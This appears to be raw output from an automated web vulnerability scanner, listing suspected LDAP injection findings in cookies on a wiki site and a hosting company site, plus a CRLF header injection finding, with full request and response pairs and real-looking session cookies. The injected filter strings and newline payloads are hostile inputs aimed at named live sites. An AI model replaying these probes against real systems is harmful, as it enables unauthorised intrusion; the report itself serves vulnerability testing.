GET /page/HTC+ALPINE HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:02:26 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1R/ygmgSHYZPBTPa46o3vcX; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:02:26 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 43248
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Alpine - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Alpine - HTC Smartphone Wiki, Alpine,phone specs" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads 35377aaaf664e1c3)(sn=* and 35377aaaf664e1c3)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /page/HTC+BLUE+ANGEL HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=35377aaaf664e1c3)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:04:43 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Q+6Wn+9o/R/6napQKp+AHS; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=62AF78062B691081ABF216F8E028B2C6; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:04:43 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57728
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Blue Angel - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
Request 2
GET /page/HTC+BLUE+ANGEL HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=35377aaaf664e1c3)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:04:44 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Q+6Wn+9o/R/6boEIAXRvZr; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:04:44 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57727
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Blue Angel - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner. In the excerpts below, however, the two responses have identical status, title and Content-Length (57599); they differ only in the re-issued wetst cookie and in the JSESSIONID set on the first request, so the reported difference is session-token volatility and this instance is most likely a false positive pending manual confirmation.
Request 1
GET /page/HTC+Smartphone+Wiki/history HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:02:15 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RgUcALK9RCBCnNbZM/Rypn; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=66B5CBC9BBBD8C7C01B9EDA22E06D15E; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:02:15 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57599
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Smartphone Wiki - History Page - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Smartphone Wiki - History Page - HTC Smartphone Wiki, Android,Device home page,Home,Home page,HTC,Pocket PC,Smartphone" /> <meta name="description" content="HTC Smartphone Wiki - HTC Smartphone Wiki - History Page" />
Request 2
GET /page/HTC+Smartphone+Wiki/history HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:02:15 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RgUcALK9RCBNDxtr28xs5l; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:02:15 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57599
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Smartphone Wiki - History Page - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Smartphone Wiki - History Page - HTC Smartphone Wiki, Android,Device home page,Home,Home page,HTC,Pocket PC,Smartphone" /> <meta name="description" content="HTC Smartphone Wiki - HTC Smartphone Wiki - History Page" />
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /page/News%20&%20Notes HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:02 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDb0KQplXflNS; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=29ACFDB542CC9D231636A2ABAB0EB558; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:02 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 48817
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>News & Notes - HTC Smartphone Wiki</title>
<meta name="keywords" content="News & Notes - HTC Smartphone Wiki, HTC pocket pcs,HTC smartphones" /> <meta name="description" content="Welcome to the HTC Wiki While this is a customer forum that is sponsored by HTC, HTC is not endorsing nor condoning any tweaks, hacks, 3rd party downloads, home..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
Request 2
GET /page/News%20&%20Notes HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:02 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDQlnXVdpGpvo; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:02 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 48816
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>News & Notes - HTC Smartphone Wiki</title>
<meta name="keywords" content="News & Notes - HTC Smartphone Wiki, HTC pocket pcs,HTC smartphones" /> <meta name="description" content="Welcome to the HTC Wiki While this is a customer forum that is sponsored by HTC, HTC is not endorsing nor condoning any tweaks, hacks, 3rd party downloads, home..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads e12e88b7f72b1e00)(sn=* and e12e88b7f72b1e00)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner. Both responses below, however, are 301 redirects to the same Location with Content-Length 0 and differ only in the re-issued wetst cookie and the JSESSIONID set on the first request, so the injected payload produced no observable change in application behaviour; this instance is most likely a false positive pending manual confirmation.
Request 1
GET /page/Sprint+Touch HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=e12e88b7f72b1e00)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 301 http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch Date: Sat, 05 Feb 2011 16:03:54 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tc3ngTgFfjbDVQBReKOu0D; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=37D200DEA26CB516297F139E657C785E; Path=/ Location: http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch Content-Length: 0 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:54 GMT Connection: close Content-Type: text/html
Request 2
GET /page/Sprint+Touch HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=e12e88b7f72b1e00)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 301 http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch Date: Sat, 05 Feb 2011 16:03:54 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tc3ngTgFfjbMkmEaMlpYtE; Domain=htcwiki.wetpaint.com; Path=/ Location: http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch Content-Length: 0 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:54 GMT Connection: close Content-Type: text/html
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads 50260929ef7288ed)(sn=* and 50260929ef7288ed)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /page/android+phones+thru+t-mobile HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=50260929ef7288ed)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:06:51 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tf1cEci1QjC1isFZiwJR4A; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=050EE660B2200406206B1511BC1E48E0; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:06:51 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 32184
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
Request 2
GET /page/android+phones+thru+t-mobile HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=50260929ef7288ed)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:06:54 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tf1cEci1QjC1VBXs5hLVz4; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:06:54 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 32182
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads 420ed5cc116574e)(sn=* and 420ed5cc116574e)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /page/thread HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=420ed5cc116574e)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 302 Moved Temporarily
Date: Sat, 05 Feb 2011 16:05:49 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVUJ1bfy3T975VOKz4zdgk; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=D0642FD589895DD7B949209A4F49E1D2; Path=/
Location: http://htcwiki.wetpaint.com/search/everything/thread?contains=thread
Content-Length: 0
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:05:49 GMT
Connection: close
Content-Type: text/html
Request 2
GET /page/thread HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=420ed5cc116574e)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sat, 05 Feb 2011 16:05:49 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVUJ1bfy3T95WfOwfgImIi; Domain=htcwiki.wetpaint.com; Path=/
Location: http://htcwiki.wetpaint.com/search/everything/thread?contains=thread
Content-Length: 0
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:05:49 GMT
Connection: close
Content-Type: text/html
The exp_last_activity cookie appears to be vulnerable to LDAP injection attacks.
The payloads 80f3942c7df929a3)(sn=* and 80f3942c7df929a3)!(sn=* were each submitted in the exp_last_activity cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /whyrackspace/network/bandwidthbilling.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=80f3942c7df929a3)(sn=*; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response 1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... "39941"; var IS_dept = "MH_Sales_en_US"; var IS_invite = "yes";
var IS_UASrackuid = "US4da9da571af9d6d58e6c524219e4d7f8"; var IS_UAScmpc = "cleanEntry"; var IS_UASreferrer = "2f0f5a42a8503e776f91e0e5"; var IS_PageName = "Why Rackspace: The Rackspace Network: Bandwidth Billing:";
Response 2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... "39941"; var IS_dept = "MH_Sales_en_US"; var IS_invite = "yes";
var IS_UASrackuid = "US4da9da571af9d6d58e6c524219e4d7f8"; var IS_UAScmpc = "cleanEntry"; var IS_UASreferrer = "http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2"; var IS_PageName = "Why Rackspace: The Rackspace Network: Bandwidth Billing:";
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the sn request parameter is copied into the Set-Cookie response header. The payload c05ff%0d%0a4e5b36c7f18 was submitted in the sn parameter. This caused a response containing an injected HTTP header.
Request
GET /scripts/wptrk?sn=c05ff%0d%0a4e5b36c7f18&v=20110120041852 HTTP/1.1
Host: create.wetpaint.com
Proxy-Connection: keep-alive
